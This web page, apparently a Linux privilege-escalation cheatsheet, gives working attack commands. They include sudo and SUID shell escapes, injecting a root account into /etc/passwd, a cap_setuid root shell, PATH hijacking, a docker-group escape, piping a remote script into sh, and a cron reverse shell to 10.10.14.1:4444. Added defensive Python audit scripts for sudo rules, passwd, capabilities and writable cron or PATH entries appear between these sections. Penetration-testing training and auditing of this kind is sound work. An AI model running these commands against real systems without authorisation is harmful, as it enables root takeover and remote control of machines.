🔺 privilege escalation

Linux Privesc Cheatsheet

The full methodology — SUID, sudo, capabilities, cron, writable paths, and kernel exploits. Commands you'll actually use.

32 techniques · 10 quiz questions · medium difficulty · by niklas-heringer.com
initial enumeration
system info
```bash
# Basic system recon
id && whoami && hostname
uname -a
cat /etc/os-release
cat /proc/version
```
quick wins — automated
```bash
# Upload and run linpeas
curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh
```
sudo misconfigurations
enumerate sudo
```bash
sudo -l
# Look for NOPASSWD entries or specific binaries
# Cross-reference at: https://gtfobins.github.io
```
common sudo escapes
```bash
# vim / vi
sudo vim -c ':!bash'
# less / man
sudo less /etc/passwd   # then: !/bin/bash
# find
sudo find . -exec /bin/bash \; -quit
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# python
sudo python3 -c 'import os; os.system("/bin/bash")'
```
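The defensive counterpart to the escapes above is an audit of the sudo policy itself. The script below is an added example, not part of the cheatsheet: it parses the rule lines of `sudo -l` output (the `(runas) TAGS: command` lines), splits comma-separated command lists, and rates each rule by whether its binary is one of the shell-escape binaries this section names and whether it runs without a password. The `SHELL_ESCAPE` set, the regex and the sample output are all the example's own constructions; GTFOBins covers far more binaries than the set used here.

```python
import re

# Binaries the cheatsheet lists as sudo shell escapes. GTFOBins covers far more;
# extend this set from there. (Assumption: this list is the example's own.)
SHELL_ESCAPE = {"vim", "vi", "less", "man", "find", "awk", "python", "python3"}

# A rule line from `sudo -l` looks like "    (ALL) NOPASSWD: /usr/bin/vim" or
# "    (root) /usr/bin/less /var/log/syslog"; tags such as NOPASSWD: or SETENV:
# sit between the runas spec and the comma-separated command list.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample output (not captured from a real host).
SAMPLE = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less /var/log/syslog
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/systemctl status nginx
"""


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) for every rule in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header, Defaults and continuation lines carry no rule
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def rate(rule):
    """Risk of one rule: ALL is critical; a shell-escape binary is critical
    without a password prompt and high with one; anything else is info."""
    _runas, nopasswd, cmd = rule
    if cmd == "ALL":
        return "critical"
    binary = cmd.split()[0].rsplit("/", 1)[-1]
    if binary in SHELL_ESCAPE:
        return "critical" if nopasswd else "high"
    return "info"


def audit_sudo(text):
    """Return [(command, risk)] for every rule rated above info."""
    findings = []
    for rule in parse_sudo_l(text):
        risk = rate(rule)
        if risk != "info":
            findings.append((rule[2], risk))
    return findings


if __name__ == "__main__":
    for cmd, risk in audit_sudo(SAMPLE):
        print(f"{risk:8s} {cmd}")
```

Run it against real output with `sudo -l | python3 audit_sudo.py` after swapping `SAMPLE` for `sys.stdin.read()`; a rule rated critical is one to replace with a wrapper script that takes no arguments and opens no editor or pager, or to drop altogether.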
SUID / SGID binaries
find SUID binaries
```bash
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# SGID
find / -perm -2000 -type f 2>/dev/null
# Either SUID or SGID (/6000 matches any of the bits)
find / -perm /6000 -type f 2>/dev/null
```
useful SUID exploits
```bash
# bash (if SUID)
/bin/bash -p
# cp — overwrite /etc/passwd
openssl passwd -1 -salt hack password123
echo 'root2:$1$hack$...:0:0:root:/root:/bin/bash' >> /etc/passwd
# nmap (older versions)
nmap --interactive
nmap> !sh
```
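The `/etc/passwd` trick above leaves two artefacts a defender can look for: a second account with uid 0, and a password hash sitting in the second field of `/etc/passwd` instead of the `x` that points to `/etc/shadow`. The checker below is an added example, not part of the cheatsheet; it parses passwd records and flags both patterns, plus malformed lines and empty password fields. The sample file is constructed and uses a placeholder where a real MD5-crypt hash would be.

```python
import sys

# Constructed sample; the last line mirrors the cheatsheet's injected entry,
# with a placeholder where a real MD5-crypt hash would be.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
root2:$1$hack$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""

# Values that legitimately appear in the password field: shadowed or locked.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Yield (lineno, fields) for each non-empty, non-comment record."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        yield lineno, line.split(":")


def audit_passwd(text):
    """Return [(lineno, account, finding)] for records that look tampered with."""
    findings = []
    for lineno, fields in parse_passwd(text):
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed record"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((lineno, name, "non-numeric uid"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, name, "extra uid 0 account"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash here is honoured by login and bypasses /etc/shadow entirely.
            findings.append((lineno, name, "password hash stored in /etc/passwd"))
    return findings


if __name__ == "__main__":
    # Audit a real file when one is given, otherwise the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else PASSWD_SAMPLE
    for lineno, name, what in audit_passwd(text):
        print(f"line {lineno}: {name}: {what}")
```

Pair this with a file-integrity baseline (or a package-manager verify of the file's mode) so that the write itself, not only its result, is noticed.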
capabilities
find capabilities
```bash
getcap -r / 2>/dev/null
# Dangerous capabilities to look for:
# cap_setuid → set UID to 0
# cap_net_raw → raw socket access
# cap_dac_override → bypass file permissions
```
python cap_setuid exploit
```bash
# If python3 has cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
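Reviewing `getcap -r /` output by eye is error-prone, and the flag suffix matters: `cap_setuid+ep` is usable at once, while `+i` alone is only inheritable. The parser below is an added example, not part of the cheatsheet; it handles both the older `path = caps` layout and the newer libcap `path caps=flags` layout, merges the flags each clause grants, and rates the capabilities this section names (the `DANGEROUS` set also adds `cap_setgid` and `cap_sys_admin`, which is the example's own choice). The sample output is constructed.

```python
import re

# Capabilities the cheatsheet calls out (cap_setuid, cap_net_raw, cap_dac_override)
# plus two that are equally well known to give root-equivalent control.
# (Assumption: this set is the example's own; extend it for your environment.)
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_net_raw", "cap_sys_admin"}

# One clause of cap_to_text() output: "cap_a,cap_b" then an operator then flags,
# e.g. "cap_net_raw+ep" or "cap_setuid=ep".
CLAUSE_RE = re.compile(r"([a-z0-9_,]+)([=+-])([eip]*)")

# Constructed `getcap -r /` output in both the older "path = caps" and the
# newer libcap "path caps" layout.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/opt/tool/bin/helper = cap_dac_override+i
"""


def parse_getcap_line(line):
    """Return (path, {cap: set(flags)}) for one getcap output line."""
    line = line.strip()
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        path, caps = line.rsplit(None, 1)
    flags_by_cap = {}
    for names, op, flags in CLAUSE_RE.findall(caps):
        if op == "-":
            continue  # a removal clause never grants anything
        for cap in names.split(","):
            flags_by_cap.setdefault(cap, set()).update(flags)
    return path, flags_by_cap


def severity(cap, flags):
    """None for capabilities outside the watch list; low when only inheritable."""
    if cap not in DANGEROUS:
        return None
    if not (flags & {"e", "p"}):
        return "low"  # inheritable only: needs an exec path that keeps it
    return "critical" if cap in {"cap_setuid", "cap_setgid"} else "high"


def audit_getcap(text):
    """Return [(path, cap, severity)] for every dangerous capability found."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        for cap, flags in caps.items():
            sev = severity(cap, flags)
            if sev:
                findings.append((path, cap, sev))
    return findings


if __name__ == "__main__":
    for path, cap, sev in audit_getcap(SAMPLE):
        print(f"{sev:8s} {cap:18s} {path}")
```

Tools such as `ping` and `arping` legitimately carry `cap_net_raw`, so the useful signal is the diff against a recorded baseline of the host's expected file capabilities, not the raw list.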
cron job abuse
enumerate cron
```bash
cat /etc/crontab
cat /etc/cron.d/*
ls -la /var/spool/cron/crontabs/
crontab -l
# Monitor what runs (pspy)
./pspy64   # github.com/DominicBreuker/pspy
```
writable cron script exploit
```bash
# If a cron script is world-writable:
echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1' >> /path/to/cron/script.sh
# Or add SUID to bash:
echo 'chmod +s /bin/bash' >> /path/to/cron/script.sh
# Then:
bash -p
```
writable paths & files
find writable files
```bash
# World-writable files
find / -writable -type f 2>/dev/null | grep -v proc
# Writable directories
find / -writable -type d 2>/dev/null
# Check /etc/passwd writable
ls -la /etc/passwd /etc/shadow /etc/sudoers
```
PATH hijacking
```bash
# If a SUID binary calls a command without full path
strings /usr/bin/suid-binary | grep -v '/'
# Create malicious binary in writable dir
echo '/bin/bash' > /tmp/curl
chmod +x /tmp/curl
export PATH=/tmp:$PATH
./suid-binary
```
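Both the cron abuse and the PATH hijack above come down to one condition: a privileged process executes something from a location an unprivileged user can write. The script below is an added example, not part of the cheatsheet, covering both sections: `audit_cron_targets` checks each script a crontab runs for a world-writable file or parent directory (and a missing target, which anyone able to create it would control), and `audit_path_variable` flags PATH entries that are relative, empty, or world-writable. It tests the other-write bit from `lstat` rather than `os.access`, so the result does not depend on which user runs the audit. The directory tree it builds is a constructed fixture, not a real host.

```python
import os
import stat
import tempfile


def is_world_writable(path):
    """True if the other-write bit is set on the inode itself (symlinks not followed)."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_cron_targets(script_paths):
    """For each script a crontab runs, flag a world-writable script (critical),
    a world-writable parent directory (high: the file can be swapped), or a
    missing target (high: whoever creates it controls the job)."""
    findings = []
    for path in script_paths:
        if not os.path.exists(path):
            findings.append((path, "high", "target missing; whoever can create it controls the job"))
            continue
        if is_world_writable(path):
            findings.append((path, "critical", "script is world-writable"))
        if is_world_writable(os.path.dirname(path)):
            findings.append((path, "high", "parent directory is world-writable"))
    return findings


def audit_path_variable(path_value):
    """Flag PATH entries an unprivileged user could populate: empty or relative
    entries and world-writable directories. The sticky bit does not help here,
    since anyone can still drop a new file into the directory."""
    findings = []
    for entry in path_value.split(":"):
        if entry == "" or not os.path.isabs(entry):
            findings.append((entry or "<empty>", "relative entry"))
        elif os.path.isdir(entry) and is_world_writable(entry):
            findings.append((entry, "world-writable directory"))
    return findings


def build_fixture():
    """Constructed directory tree (not a real host) exercising both checks."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    scripts = os.path.join(root, "scripts")      # sane 0755 directory
    drop = os.path.join(root, "drop")            # 0777 directory
    shared = os.path.join(root, "shared-bin")    # 1777, like /tmp
    for d in (scripts, drop, shared):
        os.mkdir(d)
    fx = {
        "backup": os.path.join(scripts, "backup.sh"),   # 0777: anyone can edit
        "rotate": os.path.join(scripts, "rotate.sh"),   # 0755: fine
        "cleanup": os.path.join(drop, "cleanup.sh"),    # 0755 but parent is 0777
        "gone": os.path.join(scripts, "gone.sh"),       # referenced but absent
        "shared": shared,
    }
    for key, mode in (("backup", 0o777), ("rotate", 0o755), ("cleanup", 0o755)):
        with open(fx[key], "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(fx[key], mode)
    os.chmod(scripts, 0o755)
    os.chmod(drop, 0o777)
    os.chmod(shared, 0o1777)
    return fx


if __name__ == "__main__":
    fx = build_fixture()
    for path, sev, why in audit_cron_targets([fx["backup"], fx["rotate"], fx["cleanup"], fx["gone"]]):
        print(f"{sev:8s} {path}: {why}")
    for entry, why in audit_path_variable(fx["shared"] + ":/usr/bin:."):
        print(f"PATH     {entry}: {why}")
```

On a real host, feed `audit_cron_targets` the command paths parsed from `/etc/crontab`, `/etc/cron.d/*` and the user crontabs, and `audit_path_variable` the `PATH=` line from those crontabs (or the `secure_path` from sudoers). A SUID program that must call helpers should set its own fixed PATH and use absolute paths, which removes the hijack surface regardless of what this audit finds.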
quick reference — vectors
| Vector | Check | Exploit path | Risk |
|---|---|---|---|
| sudo -l | Any NOPASSWD entries | GTFOBins shell escape | critical |
| SUID bash | find / -perm -4000 | bash -p | critical |
| Writable /etc/passwd | ls -la /etc/passwd | Add root user manually | critical |
| cap_setuid | getcap -r / 2>/dev/null | python3 os.setuid(0) | critical |
| Writable cron script | pspy + ls -la | Append reverse shell | high |
| PATH hijacking | strings on SUID bins | Fake binary in $PATH | high |
| Kernel exploit | uname -a → searchsploit | Compile & run PoC | high |
| Docker group | id \| grep docker | docker run -v /:/mnt alpine | critical |

